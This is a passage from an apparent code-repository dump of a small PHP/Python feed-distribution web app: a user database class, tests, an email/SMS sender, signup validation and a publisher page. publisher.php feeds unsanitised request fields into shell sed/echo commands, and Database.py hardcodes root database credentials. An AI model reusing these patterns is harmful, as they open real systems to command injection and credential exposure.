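The comments above are candid that interpolated identifiers, the $attr parameter and the $userinfo keys, are the injection surface, while values are safely bound. Placeholders cannot stand in for column names, so the usual remedy is an explicit whitelist before interpolation; a sketch against sqlite3 with a hypothetical column set (find_uid is not part of the PHP class):

SAFE_COLUMNS = frozenset(('uid', 'username', 'email', 'phone_number'))

def find_uid(conn, attr, value):
    """Look up a user by one whitelisted column; the value is always bound."""
    if attr not in SAFE_COLUMNS:
        raise ValueError('unsupported search column: %r' % (attr,))
    cursor = conn.execute(
        'SELECT uid FROM users WHERE %s=?;' % attr, (value,))
    row = cursor.fetchone()
    return row[0] if row is not None else None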
This function was added in order to \n use typehinting on parameter $db.\n */\n private static function __create($userinfo, SQLiteDB $db) {\n // parse $userinfo into a format able to be fed straight into the database\n $db_userinfo = self::parseUserInfo($userinfo, $db);\n\n // carrier requires cid to be looked up in database\n static $carrier_col = 'cid';\n static $carrier_sql =\n '(SELECT cid FROM carriors WHERE carrior_name=:carrior_name)';\n $carrier_bind = array('carrior_name'=>$userinfo['carrier']);\n\n // build the SQL query to use to create the user\n $create_sql = 'INSERT INTO users (';\n // add column names\n foreach ($db_userinfo as $col=>$value)\n $create_sql .= $col.', ';\n $create_sql .= $carrier_col.', ';\n // remove trailing comma and space\n $create_sql = substr($create_sql, 0, -2);\n // add column values\n $create_sql .= ') VALUES (';\n foreach ($db_userinfo as $col=>$value)\n $create_sql .= ':'.$col.', ';\n $create_sql .= $carrier_sql.', ';\n // remove trailing comma and space\n $create_sql = substr($create_sql, 0, -2);\n $create_sql .= ');';\n\n // prepare the SQL statement\n $create_stmt = $db->pdo->prepare($create_sql);\n\n // bind column values\n foreach (array_merge($db_userinfo, $carrier_bind) as $col=>$value)\n $create_stmt->bindValue(':'.$col, $value);\n \n // execute the SQL statement\n $create_stmt->execute();\n\n // XXX there is probably a better way to do this\n return SQLiteUser::find('username', $userinfo['username'], $db);\n }\n\n/* SQLiteUser::delete implements iUser::delete (see corresponding \n documentation)\n*/\n public function delete() {\n // build the SQL query to use to delete the user\n static $delete_sql = 'DELETE FROM users WHERE uid=:uid;';\n // prepare the SQL statement\n $delete_stmt = $this->db->pdo->prepare($delete_sql);\n // bind column values\n $delete_stmt->bindValue(':uid', $this->uid);\n // execute the SQL statement\n $delete_stmt->execute();\n\n /* unset $this->uid so that future operations on this SQLiteUser object\n will fail */\n unset ($this->uid);\n }\n}\n\n/* class SQLiteTest contains functions used for unit testing on SQLiteObject\n derived classes\n*/\nclass SQLiteTest {\n public static function testAll() {\n $db = self::testDB();\n self::testUser($db);\n self::testUsers($db);\n }\n\n/* function SQLiteTest::testDB tests the semantics of operations in class \n SQLiteDB. 
These tests require a file called 'SQLiteDB.sql' containing SQL\n which initializes a valid watercooler SQLite database and an empty writable\n directory called 'test'.\n\n returns an SQLiteDB object connected to a test database\n*/\n public static function testDB() {\n static $db_file = 'test/SQLiteTest.db';\n static $db_sql = 'SQLiteDB.sql';\n static $sqlite3_prog = 'sqlite3';\n static $ini_file = 'test/db_def_cfg.ini';\n static $ini_contents = \"\\\n[SQLiteDB]\nfilename=test/SQLiteTest.db\n\";\n\n // create test SQLite database\n unlink($db_file);\n exec(\"$sqlite3_prog -init $db_sql $db_file\");\n\n // SQLiteDB::connect test\n $db = SQLiteDB::connect(array('filename'=>$db_file));\n if (!($db instanceof SQLiteDB))\n throw new Exception('SQLiteDB::connect test failed');\n\n // SQLiteDB::connectFromIni test\n file_put_contents($ini_file, $ini_contents);\n $db = SQLiteDB::connectFromIni('test/db_def_cfg.ini');\n if (!($db instanceof SQLiteDB))\n throw new Exception('SQLiteDB::connect test failed');\n\n return $db;\n }\n\n public static function testUser(SQLiteDB $db) {\n static $userinfo = array('username'=>'testuser',\n\t\t\t 'password'=>'testpassword',\n\t\t\t 'email'=>'testemail',\n\t\t\t 'phone_number'=>'testphone',\n\t\t\t 'carrier'=>'testcarrier');\n static $userinfo_2 = array('username'=>'testuser2',\n\t\t\t 'password'=>'testpassword2',\n\t\t\t 'email'=>'testemail2',\n\t\t\t 'phone_number'=>'testphone2',\n\t\t\t 'carrier'=>'testcarrier2');\n\n // SQLiteUser::create test\n $user = SQLiteUser::create($userinfo, $db);\n if ($user === NULL)\n throw new Exception('SQLiteUser::create test failed');\n\n // SQLiteUser::find test\n $find_user = SQLiteUser::find('username', $userinfo['username'], $db);\n if ($find_user === NULL)\n throw new Exception('SQLiteUser::find test failed');\n\n // SQLiteUser::delete test\n $user->delete();\n $deleted_user = SQLiteUser::find('username', $userinfo['username'], $db);\n if ($deleted_user !== NULL)\n throw new Exception('SQLiteUser::delete test failed');\n\n // SQLiteUser::get test\n $user = SQLiteUser::create($userinfo, $db);\n $get_userinfo = $user->get(array_keys($userinfo));\n if ($get_userinfo != $userinfo)\n throw new Exception('SQLiteUser::get test failed');\n\n // SQLiteUser::get no-carrier-as-attr test\n $userinfo_nocarrier = $userinfo;\n unset($userinfo_nocarrier['carrier']);\n $get_userinfo_nocarrier = $user->get(array_keys($userinfo_nocarrier));\n if ($get_userinfo_nocarrier != $userinfo_nocarrier)\n throw new Exception('SQLiteUser::get no-carrier-as-attr test failed');\n\n // SQLiteUser::set test\n $user->set($userinfo_2);\n $set_userinfo = $user->get(array_keys($userinfo_2));\n if ($set_userinfo != $userinfo_2)\n throw new Exception('SQLiteUser::set test failed');\n\n // SQLiteUser::set no-carrier-as-attr test\n $userinfo_2_nocarrier = $userinfo_2;\n unset($userinfo_2_nocarrier['carrier']);\n $get_userinfo_2_nocarrier = $user->get(array_keys($userinfo_2_nocarrier));\n if ($get_userinfo_2_nocarrier != $userinfo_2_nocarrier)\n throw new Exception('SQLiteUser::set no-carrier-as-attr test failed');\n\n // SQLiteUser::__get test\n $get_username = $user->get(array('username'));\n if ($user->username !== $get_username['username'])\n throw new Exception('SQLiteUser::__get test failed');\n\n // SQLiteUser::__set test\n $user->username = 'newusername';\n if ($user->username !== 'newusername')\n throw new Exception('SQLiteUser::__set test failed');\n\n $user->delete();\n }\n\n public static function testUsers(SQLiteDB $db) {\n static $userinfo = 
array('username'=>'testuser',\n\t\t\t 'password'=>'testpassword',\n\t\t\t 'email'=>'testemail',\n\t\t\t 'phone_number'=>'testphone',\n\t\t\t 'carrier'=>'testcarrier');\n static $userinfo_2 = array('username'=>'testuser2',\n\t\t\t 'password'=>'testpassword',\n\t\t\t 'email'=>'testemail2',\n\t\t\t 'phone_number'=>'testphone2',\n\t\t\t 'carrier'=>'testcarrier');\n\n // SQLiteUsers::searchAll test\n $user = SQLiteUser::create($userinfo, $db);\n $user_2 = SQLiteUser::create($userinfo_2, $db);\n $search_users = \n SQLiteUsers::searchAll(array_intersect($userinfo, $userinfo_2), $db);\n if ($search_users === NULL || count($search_users->users) !== 2)\n throw new Exception('SQLiteUsers::searchAll test failed');\n\n // SQLiteUsers::searchAny username test\n $search_users = \n SQLiteUsers::searchAny(array('username'=>\n\t\t\t\t array($userinfo['username'],\n\t\t\t\t\t $userinfo_2['username'])), $db);\n if ($search_users === NULL || count($search_users->users) !== 2)\n throw new Exception('SQLiteUsers::searchAny username test failed');\n\n // SQLiteUsers::searchAll match-one test\n $search_users = \n SQLiteUsers::searchAll(array_diff($userinfo, $userinfo_2), $db);\n if ($search_users === NULL || count($search_users->users) !== 1)\n throw new Exception('SQLiteUsers::searchAll match-one test failed');\n\n // SQLiteUsers::searchAny match-one test\n $search_users_2 = \n SQLiteUsers::searchAny(array('username'=>$userinfo_2['username']), $db);\n if ($search_users_2 === NULL || count($search_users_2->users) !== 1)\n throw new Exception('SQLiteUsers::searchAny username match-one test '.\n\t\t\t 'failed');\n\n // SQLiteUsers::merge test\n $merge_users = $search_users->merge($search_users_2);\n if ($merge_users === NULL || count($merge_users->users) !== 2)\n throw new Exception('SQLiteUsers::merge test failed');\n }\n}\n\n//SQLiteTest::testAll();\n" }, { "alpha_fraction": 0.6108005046844482, "alphanum_fraction": 0.6170734763145447, "avg_line_length": 31.58222198486328, "blob_id": "fba090e160a5d08c4eee5c235487cf83cf0d4c75", "content_id": "64bccae7a297d6ae102ee6d4d5e08d57a53c773c", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 7333, "license_type": "no_license", "max_line_length": 193, "num_lines": 225, "path": "/EmailServer.py", "repo_name": "TheProjecter/watercooler-content-distribution", "src_encoding": "UTF-8", "text": "#!/usr/bin/python2.6\n\nimport smtplib\nfrom email.mime.multipart import MIMEMultipart\nfrom email.mime.text import MIMEText\n\nfrom urlparse import urlparse\n\nimport sys\nimport Database\n\nHOST = {'AT&T':'txt.att.net',\n 'T-Mobile':'tmomail.net',\n 'Verizon':'vtext.com',\n 'SprinT':'messaging.sprintpcs.com'}\n\nSENDER = '[email protected]'\n\ndef sendAsEmail(emailAddr, message):\n \"\"\"(Internal Use) Send email using smtplib\n \n Input is a destination email address and a MIMEMultipart message. This\n function is intended to be used with formatEmail function. However, any\n other function that supples the right input can work.\n \"\"\"\n # Create a SMTP connection. It is assumed that a\n # MTA is set up locally.\n smtpObj = smtplib.SMTP('localhost')\n\n sendlist = []\n sendlist.append(emailAddr)\n\n # TODO: Catch the exceptions.\n smtpObj.sendmail(SENDER, sendlist, message.as_string())\n\ndef sendAsText(phoneNum, provider, subject, body):\n \"\"\"(Internal Use) Send text message (SMS) through email\n \n This function composes the destination address using the following\n format: phone_number@provider_server. 
If you have AT&T, the destination\n address may look like the following: [email protected]. This\n works because major phone providers have servers that deliver email\n messages to the user's phone using SMS. \n \"\"\"\n # Create an SMTP connection. It is assumed that an\n # MTA is set up locally.\n smtpObj = smtplib.SMTP('localhost')\n\n # Check that the given provider is one of the hosts we support\n if provider not in HOST:\n print \"We do not support \" + provider + \".\"\n return\n\n # Remove '-' from phone number\n phoneNum = phoneNum.replace(\"-\", \"\")\n\n # Set Email Address\n emailAddr = phoneNum + \"@\" + HOST[provider] \n\n # Construct the message body\n message = MIMEMultipart()\n message['Subject'] = subject\n message['From'] = SENDER\n message['To'] = emailAddr\n message.attach(MIMEText(body, 'plain'))\n\n sendlist = []\n sendlist.append(emailAddr)\n\n # TODO: Catch the exceptions.\n smtpObj.sendmail(SENDER, sendlist, message.as_string()) \n\ndef formatEmail(feed, emailAddr):\n \"\"\"(Internal Use) Compose an email based on a given feed and destination\n \n Returns a MIMEMultipart message. \n \"\"\"\n \n # Rename variables\n feedURL = feed[0] \n entries_URL = feed[1]\n entries_titles = feed[2]\n entries_contents = feed[3]\n\n # Find the Subject of the Email\n parsed_url = urlparse(feedURL)\n subject = parsed_url.netloc\n\n # Construct the message body\n message = MIMEMultipart()\n message['Subject'] = subject\n message['From'] = SENDER\n message['To'] = emailAddr\n \n # Build an HTML version of the email body \n body = \"<html><head></head><body>\"\n \n # I assume that entries_URL, entries_titles, and entries_contents all\n # have the same number of elements. \n numEntries = len(entries_URL)\n for index in range(numEntries):\n \n link = \"<a href=\\\"\" + entries_URL[index] + \"\\\">\" + \\\n entries_titles[index] + \"</a>\" \n content = entries_contents[index]\n body += link + \"<br />\" + content\n\n if index < (numEntries - 1):\n body += \"<br /><br />\"\n \n body += \"</body></html>\"\n message.attach(MIMEText(body, \"html\"))\n \n return message\n\ndef sendFeedAsSMS(feed, user):\n \"\"\"(Internal Use) Send the stories in the given feed to the given user\n\n \"\"\"\n \n # Rename variables\n entries_URL = feed[1]\n entries_titles = feed[2]\n entries_contents = feed[3]\n\n phoneNum = user[2]\n provider = user[3]\n send_method = user[4]\n \n numEntries = len(entries_titles)\n \n # Send each story to the given user. I assume that entries_URL,\n # entries_titles, and entries_contents all have the same number of elements.\n for index in range(numEntries):\n if send_method == \"sms_text\":\n sendAsText(phoneNum, provider, entries_titles[index], \\\n entries_contents[index])\n elif send_method == \"sms_link\":\n sendAsText(phoneNum, provider, entries_titles[index], \\\n entries_URL[index])\n\ndef sendStories(listOfFeeds):\n \"\"\"(API) Send the stories in the list of feeds to the subscribers\n\n For each feed in listOfFeeds, sendStories will pull the list of users \n who subscribe to that feed. 
Then, it will send the stories to each user\n based on that receiver's preferred receiving method.\n \"\"\"\n for feed in listOfFeeds:\n \n # Rename variables \n feedURL = feed[0]\n entries_URL = feed[1]\n entries_titles = feed[2]\n entries_contents = feed[3]\n \n listOfUsers = Database.getUsersBySourceURL(feedURL)\n print 'LC DEBUG EM 158, LIST OF USERS: '\n print str(listOfUsers), '\\n'\n for user in listOfUsers:\n\n # Rename variables\n username = user[0]\n emailAddr = user[1]\n phone = user[2]\n carrier = user[3]\n send_method = user[4] \n\n # Check the user's status\n emailStatusList = Database.getEmailStatusByUsername(username)\n emailStatus = emailStatusList[0][0] \n\n textStatusList = Database.getPhoneStatusByUsername(username)\n textStatus = textStatusList[0][0]\n \n # Send stories based on the user's preferred method\n if emailStatus != 0:\n print 'LC DEBUG EM 178, emailStatus != 0, NO SENT for ', username, ' ||| '\n\n if send_method == \"email\" and emailStatus == 0:\n print 'LC DEBUG EM 181, sending email to ', username, ' ||| '\n message = formatEmail(feed, emailAddr)\n sendAsEmail(emailAddr, message)\n\n if send_method == \"sms_text\" and textStatus == 0:\n print 'LC DEBUG EM 186, sending text sms to ', username, ' ||| '\n sendFeedAsSMS(feed, user)\n\n if send_method == \"sms_link\" and textStatus == 0:\n print 'LC DEBUG EM 190, sending link sms to ', username, ' ||| '\n sendFeedAsSMS(feed, user)\n\ndef sendConfirmEmail(link, username, emailAddr):\n \"\"\"(API) Send confirmation Email to user\n \n All inputs are strings. link is the URL you want the user to click. \n \"\"\"\n # Construct the message body\n message = MIMEMultipart()\n message['Subject'] = \"Please confirm your Email address\"\n message['From'] = SENDER\n message['To'] = emailAddr\n \n # Build an HTML version of the email body \n body = \"<html><head></head><body>\"\n \n content = \"Hello \" + username + \",<br /><br />Thank you for using Watercooler. Please click on the link below to confirm your Email address:<br \\><br \\><a href=\\\"\" + link + \"\\\">Confirm</a>\"\n \n body += content\n body += \"</body></html>\"\n message.attach(MIMEText(body, \"html\"))\n \n sendAsEmail(emailAddr, message)\n\ndef sendConfirmSMS(phoneNum, provider, username, pin):\n \"\"\"(API) Send confirmation SMS to user\n \n All inputs are strings, including pin.\n \"\"\"\n # Form body of message\n subject = \"PIN:\" + pin\n content = \"Thank you for using Watercooler. 
Please enter this pin in your settings page.\"\n \n # Send message as SMS\n sendAsText(phoneNum, provider, subject, content)\n\n\n" }, { "alpha_fraction": 0.6086777448654175, "alphanum_fraction": 0.6158749461174011, "avg_line_length": 31.858108520507812, "blob_id": "b1448e7f12bfd40506e9db987e42f2a7b373d414", "content_id": "c2bd82a38d5369a6fcb83de6f3be51d600866a42", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "PHP", "length_bytes": 4863, "license_type": "no_license", "max_line_length": 174, "num_lines": 148, "path": "/www/trunk/publisher.php", "repo_name": "TheProjecter/watercooler-content-distribution", "src_encoding": "UTF-8", "text": "<?php\n\ninclude_once('db_init.php');\ninclude_once('common.php');\ninclude_once('auth.php');\n\n?>\n\n<!DOCTYPE html PUBLIC \"-//W3C//DTD XHTML 1.0 Strict//EN\"\n\t \"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd\">\n<html lang=\"EN\" dir=\"ltr\" xmlns=\"http://www.w3.org/1999/xhtml\">\n <head>\n <link rel=\"SHORTCUT ICON\" href=\"http://geogriffin.mine.nu/watercooler/matt/watercooler-content-distribution/favicon.ico\" />\n <meta http-equiv=\"content-type\" content=\"text/xml; charset=utf-8\" />\n <title>Welcome to the Watercooler!</title>\n <link rel=\"stylesheet\" title=\"watercooler\" href=\"watercooler.css\" type=\"text/css\"/>\n </head>\n <body>\n <div id=\"wrap\">\n <div id=\"logo\">\n\t<img src=\"watercooler_logo.png\" alt=\"Welcome to the Watercooler\" />\n </div>\n \n <form class=\"publisher\" action=\"<?php echo $_SERVER['PHP_SELF'];?>\" method=\"post\">\n\t\n\t<!-- Feed Information -->\n\t<fieldset><legend>Feed Information</legend>\n\t \n\t <!-- Title -->\n\t <div class=\"lineWidth\">\n\t <label class=\"leftCol\" for=\"feedTitle\">Feed Title</label>\n\t <input class=\"middleCol\" id=\"feedTitle\" type=\"text\" name=\"feedTitle\" maxlength=\"100\" />\n\t </div>\n\t \n\t <!-- Website -->\n\t <div class=\"lineWidth\">\n\t <label class=\"leftCol\" for=\"feedWebsite\">Feed Website</label>\n\t <input class=\"middleCol\" id=\"feedWebsite\" type=\"text\" name=\"feedWebsite\" maxlength=\"100\" />\n\t </div>\n\t \n\t <!-- Description -->\n\t <div class=\"lineWidth\">\n\t <label class=\"leftCol\" for=\"feedDescription\">Feed Description</label>\n\t <textarea class=\"middleCol\" rows=\"5\" id=\"feedDescription\" name=\"feedDescription\" maxlength=\"160\" style=\"height:5em;\" ></textarea>\n\t </div>\n\t</fieldset>\n\n\t<!-- New Story -->\n\t<fieldset class=\"publisher\"><legend>New Story</legend>\n\n\t <!-- Title -->\n\t <div class=\"lineWidth\">\n\t <label class=\"leftCol\" for=\"storyTitle\">Title</label>\n\t <input class=\"middleCol\" type=\"text\" id=\"storyTitle\" name=\"storyTitle\" maxlength=\"100\" />\n\t </div>\n\n\t <!-- Link -->\n\t <div class=\"lineWidth\">\n\t <label class=\"leftCol\" for=\"storyLink\">Link</label>\n\t <input class=\"middleCol\" type=\"text\" id=\"storyLink\" name=\"storyLink\" maxlength=\"100\" />\n\t </div>\n\n\t <!-- Description -->\n\t <div class=\"lineWidth\">\n\t <label class=\"leftCol\" for=\"storyDescription\">Description</label>\n\t <textarea class=\"middleCol\" rows=\"5\" id=\"storyDescription\" name=\"storyDescription\" maxlength=\"160\"></textarea>\n\t </div>\n\t \n\t <!-- Submit -->\n\t <div class=\"lineWidth\">\n\t <input class=\"middleCol clickable\" type=\"submit\" name=\"submit\" value=\"Publish!\" style=\"float:none; margin-left:8em; text-align:center; font-weight:bolder; height:2em;\"/>\n\t </div>\n\t</fieldset>\n </form>\n </div>\n\n<?php\n\n\n$rssString = 
\"/var/www/rss/{$user->username}.xml\";\n\n// set the default title\n$category = \"title\";\n$scriptString = \"sed -i 's/<!-- Feedinfo --><$category>.*<\\/$category>/<!-- Feedinfo --><$category>{$_REQUEST['feedTitle']}<\\/$category>/g'\";\nsystem(\"{$scriptString} {$rssString}\");\n\n// set the pubdate\n$category = \"pubdate\";\n$date = date('F\\ j\\,\\ Y\\ g:i\\ A\\ T');\n$scriptString = \"sed -i 's/<!-- Feedinfo --><$category>.*<\\/$category>/<!-- Feedinfo --><$category>{$date}<\\/$category>/g'\";\nsystem(\"{$scriptString} {$rssString}\");\n\n// set the default website\n$category = \"link\";\n$scriptString = \"sed -i 's/<!-- Feedinfo --><$category>.*<\\/$category>/<!-- Feedinfo --><$category>{$_REQUEST['feedWebsite']}<\\/$category>/g'\";\nsystem(\"{$scriptString} {$rssString}\");\n\n// set the default description\n$category = \"description\";\n$scriptString = \"sed -i 's/<!-- Feedinfo --><$category>.*<\\/$category>/<!-- Feedinfo --><$category>{$_REQUEST['feedDescription']}<\\/$category>/g'\";\nsystem(\"{$scriptString} {$rssString}\");\n\n// set the last build date\n$category = \"lastBuildDate\";\n$scriptString = \"sed -i 's/<!-- Feedinfo --><$category>.*<\\/$category>/<!-- Feedinfo --><$category>{$date}<\\/$category>/g'\";\nsystem(\"{$scriptString} {$rssString}\");\n\n// remove ending\nsystem(\"sed -i '\\$d' {$rssString}\");\nsystem(\"sed -i '\\$d' {$rssString}\");\n\n// add opening item tag\n$tag = '<item>';\nsystem(\"echo \\\"{$tag}\\\" >> {$rssString}\");\n\n// add story title\n$line = \"<title>{$_REQUEST['storyTitle']}</title>\";\nsystem(\"echo \\\"{$line}\\\" >> {$rssString}\");\n\n// add link\n$line = \"<link>{$_REQUEST['storyLink']}</link>\";\nsystem(\"echo \\\"{$line}\\\" >> {$rssString}\");\n\n// add description\n$line = \"<description>{$_REQUEST['storyDescription']}</description>\";\nsystem(\"echo \\\"{$line}\\\" >> {$rssString}\");\n\n// add pubdate\n$date = date('F\\ j\\,\\ Y\\ g:i\\ A\\ T');\n$line = \"<pubdate>{$date}</pubdate>\";\nsystem(\"echo \\\"{$line}\\\" >> {$rssString}\");\n\n// add ending item tag\n$tag = '</item>';\nsystem(\"echo \\\"{$tag}\\\" >> {$rssString}\");\n\n// add ending channel tag\n$tag = '</channel>';\nsystem(\"echo \\\"{$tag}\\\" >> {$rssString}\");\n\n// add ending rss tag\n$tag = '</rss>';\nsystem(\"echo \\\"{$tag}\\\" >> {$rssString}\");\n\n?>\n\n </body>\n</html>\n" }, { "alpha_fraction": 0.5814497470855713, "alphanum_fraction": 0.5931410789489746, "avg_line_length": 34.61111068725586, "blob_id": "c807832e4aa46ba1861906c25d5a41c03c4535e9", "content_id": "92fee59dca3a09d5e63e51613210bef71f1a28ee", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1283, "license_type": "no_license", "max_line_length": 96, "num_lines": 36, "path": "/www/trunk/Database.py", "repo_name": "TheProjecter/watercooler-content-distribution", "src_encoding": "UTF-8", "text": "#!/usr/bin/python2.6\n\nimport sys\nimport MySQLdb\n\n# parameters:\n# my_feed_url = (string) feed entry url\n# return:\n# python list of tuples of strings of usernames of each user who needs this story\n# [(username, email, phone, carrior, method), (username2, email2, phone2, carrior, method).....]\n# phone: (string): 909-802-8597\n# carrior: (string): AT&T, Verizon, T-Mobile, Sprint\n# method: (string): email, sms_text, sms_link\ndef getUsersBySourceURL ( my_source_url ):\n \n conn = MySQLdb.connect (host = \"localhost\",\n user = \"root\",\n passwd = \"adminsql\",\n db = \"watercooler\")\n \n cursor = conn.cursor ()\n cursor.execute (\"\"\"\n 
SELECT username, email, phone_number, carrior_name, method_type\n FROM users, favorites, feed_sources, carriors, receptions, reception_methods\n WHERE users.uid = favorites.uid\n AND users.cid = carriors.cid\n AND users.uid = receptions.uid\n AND receptions.rid = reception_methods.rid\n AND feed_sources.sid = favorites.sid\n AND feed_sources.source_url = %s\n \"\"\", my_source_url)\n retVal = cursor.fetchall ()\n cursor.close ()\n conn.close ()\n \n return retVal\n\n" }, { "alpha_fraction": 0.588790237903595, "alphanum_fraction": 0.600443959236145, "avg_line_length": 34.25490188598633, "blob_id": "c93ff1cc67e2d634ace545e5dca155373e756682", "content_id": "60cc1eef2e367a714e46d532af33db1932976663", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "PHP", "length_bytes": 1802, "license_type": "no_license", "max_line_length": 148, "num_lines": 51, "path": "/www/trunk/index.php", "repo_name": "TheProjecter/watercooler-content-distribution", "src_encoding": "UTF-8", "text": "<?php\nrequire_once('auth.php');\nif (!isset($user)) {\n?>\n<!DOCTYPE html PUBLIC \"-//W3C//DTD XHTML 1.0 Strict//EN\"\n\"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd\">\n<html lang=\"EN\" dir=\"ltr\" xmlns=\"http://www.w3.org/1999/xhtml\">\n <head>\n <link rel=\"SHORTCUT ICON\" href=\"http://geogriffin.mine.nu/watercooler/matt/watercooler-content-distribution/favicon.ico\" />\n <meta http-equiv=\"content-type\" content=\"text/xml; charset=utf-8\" />\n <title>Welcome to the Watercooler!</title>\n <link rel=\"stylesheet\" title=\"watercooler\" href=\"watercooler.css\" type=\"text/css\"/>\n <script type=\"text/JavaScript\" src=\"http://ajax.googleapis.com/ajax/libs/jquery/1.3.2/jquery.min.js\"></script>\n <script type=\"text/JavaScript\">\n $(document).ready(function(){$('#userName').focus();});\n </script>\n \n </head>\n <body>\n <div id=\"wrap\">\n <div id=\"logo\">\n\t<a href=\"index.php\"><img src=\"watercooler_logo.png\" alt=\"Welcome to the Watercooler\" /></a>\n </div>\n <form action=\"login.php\" method=\"post\">\n <fieldset class=\"thin\"><legend>Watercooler</legend>\n\t <p class=\"thin\">\n <label for=\"userName\">username</label>\n <input type=\"text\" id=\"userName\" name=\"userName\" />\n </p>\n\t <p class=\"thin\">\n\t <label for=\"userPassword\">password</label>\n <input type=\"password\" name=\"userPassword\" />\n\t </p>\n\t <p class=\"submit\">\n\t <input type=\"submit\" value=\"Login\" \n\t\t name=\"submit\" />\n\t </p>\n </fieldset>\n </form>\n <div>Need an account?</div>\n <div>\n\t<a href=\"signup.php\">Sign up!</a>\n </div>\n </div>\n <div class=\"validated\">\n <a href=\"http://validator.w3.org/check?uri=referer\"><img src=\"http://www.w3.org/Icons/valid-xhtml10\" alt=\"Valid XHTML 1.0 Strict\" /></a></div>\n </body>\n</html>\n<?php\n } else {\n include(\"homepage.php\");\n }\n \n" }, { "alpha_fraction": 0.5863789319992065, "alphanum_fraction": 0.591019868850708, "avg_line_length": 30.08664321899414, "blob_id": "8dcef011db8e84d3be4dccd596ea3c746c8653c6", "content_id": "667012240c927d10b8f6f5de14009d44f559cb2b", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "PHP", "length_bytes": 8619, "license_type": "no_license", "max_line_length": 187, "num_lines": 277, "path": "/www/trunk/verifySignup.php", "repo_name": "TheProjecter/watercooler-content-distribution", "src_encoding": "UTF-8", "text": " \n <?php\n\n /**\n * This function can be used to check the sanity of variables\n * @param string $type The type of the variable; can be bool, float, numeric, string, array, or object\n * @param 
string $string The variable name you would like to check\n * @param string $length The maximum length of the variable\n *\n * return bool\n */\n function sanityCheck($string, $type, $length){\n\n // assign the type\n $type = 'is_'.$type;\n \n if(!$type($string))\n\t {\n\t return FALSE;\n\t }\n // now we see if there is anything in the string\n elseif(empty($string))\n\t {\n\t return FALSE;\n\t }\n // then we check how long the string is\n elseif(strlen($string) > $length)\n\t {\n\t return FALSE;\n\t }\nelse\n {\n // if all is well, we return TRUE\n return TRUE;\n }\n }\n\n // check ALL the REQUEST variables\nfunction checkSet()\n{\n return isset($_REQUEST['userName'], $_REQUEST['userPassword'], $_REQUEST['userRepeatPass'], $_REQUEST['userEmail'], $_REQUEST['userCell'], $_REQUEST['userCarrier']);\n}\n\nfunction checkEmail($email)\n{\n return preg_match('/^\\S+@[\\w\\d.-]{2,}\\.[\\w]{2,6}$/iU', $email) ? TRUE : FALSE;\n}\n\n// check all our variables are set\nif(checkSet() != FALSE)\n {\n // Sanity check the username variable.\n\n if(empty($_REQUEST['userName'])==FALSE && sanityCheck($_REQUEST['userName'], 'string', 25) != FALSE)\n {\n\tif(User::find('username',$_REQUEST['userName']) != NULL)\n\t {\n\t echo '<p style=\"color:red\">Username is already in use. Please try another username.</p>';\n\t exit();\n\t }\n\telse\n\t {\n\t $userName = $_REQUEST['userName'];\n\t }\n }\n else\n {\n echo '<p style=\"color:red\">Username is not set</p>';\n\t$_REQUEST['userName'] = '';\n exit();\n }\n\n // *************** TODO **************\n // *Verify that username is available*\n // ***********************************\n\n // Validate the password input\n if(empty($_REQUEST['userPassword'])==FALSE && sanityCheck($_REQUEST['userPassword'], 'string', 10) != FALSE)\n {\n\tif (strlen($_REQUEST['userPassword']) < 6)\n\t {\n\t echo '<p style=\"color:red\">Please choose a password of at least 6 characters</p>';\n\t $_REQUEST['userPassword'] = '';\n\t exit();\n\t }\n\telse\n\t {\n\t $userPassword = $_REQUEST['userPassword'];\n\t }\n }\n else\n {\n echo '<p style=\"color:red\">Please enter a valid Password</p>';\n\t$_REQUEST['userPassword'] = '';\n exit();\n }\n\n // Make sure that the two password entries are identical\n if (empty($_REQUEST['userRepeatPass'])==FALSE && sanityCheck($_REQUEST['userRepeatPass'], 'string', 10) != FALSE)\n {\n\t$userRepeatPass = $_REQUEST['userRepeatPass'];\n\tif ($userPassword != $userRepeatPass)\n\t {\n\t echo '<p style=\"color:red\">Password mismatch. Please re-enter your password.</p>';\n\t exit();\n\t }\n }\n else\n {\n\techo '<p style=\"color:red\">Please enter your password again in the Repeat Password field.</p>';\n\texit();\n }\n\n // Make sure that the email is syntactically valid\n if (empty($_REQUEST['userEmail'])==FALSE && sanityCheck($_REQUEST['userEmail'], 'string', 50) != FALSE)\n {\n\tif (checkEmail($_REQUEST['userEmail']) == FALSE)\n\t {\n\t echo '<p style=\"color:red\">Please enter a valid email address.</p>';\n\t $_REQUEST['userEmail'] = '';\n\t exit();\n\t }\n\t else\n\t {\n\t if(User::find('email',$_REQUEST['userEmail']) != NULL)\n\t\t{\n\t\t echo '<p style=\"color:red\">This email is already in use. 
Please use another email address.</p>';\n\t\t exit();\n\t\t}\n\t else\n\t\t{\n\t\t $userEmail = $_REQUEST['userEmail'];\n\t\t}\n\t }\n }\n else\n {\n\techo '<p style=\"color:red\">A valid email address is required to register with Watercooler.</p>';\n\texit();\n }\n\n // Validate the user's cell phone number\n if (empty($_REQUEST['userCell'])==FALSE)\n {\n\tif (sanityCheck($_REQUEST['userCell'],'numeric', 10) != FALSE)\n\t {\n\t if (strlen($_REQUEST['userCell']) != 10)\n\t {\n\t\techo '<p style=\"color:red\">A valid cell phone number must be exactly ten digits long</p>';\n\t\t$_REQUEST['userCell'] = '';\n\t\texit();\n\t }\n\t else\n\t {\n\t\tif(($this_user_object = User::find('phone_number',$_REQUEST['userCell'])) != NULL)\n\t\t {\n\t\t echo '<p style=\"color:red\">There is already an account associated with this cell phone number. If you do not own an account named ';\n\t\t $this_user_array = $this_user_object->get((array)'username');\n\t\t echo $this_user_array['username'];\n\t\t echo ', please email our <a href=\"mailto:[email protected]\">webmaster</p>';\n\t\t exit();\n\t\t }\n\t\t$userCell = $_REQUEST['userCell'];\n\t }\n\t }\n\telse\n\t {\n\t echo '<p style=\"color:red\">Please enter a valid cell phone number (only numeric characters).</p>';\n\t $_REQUEST['userCell'] = '';\n\t exit();\n\t }\n }\n else\n {\n\techo '<p style=\"color:red\">Please enter your cell phone number. Note that you will not receive text messages from Watercooler unless you select a texting reception method.</p>';\n\texit();\n }\n\n if (isset($_REQUEST['feed'])) {\n $feedinfos = 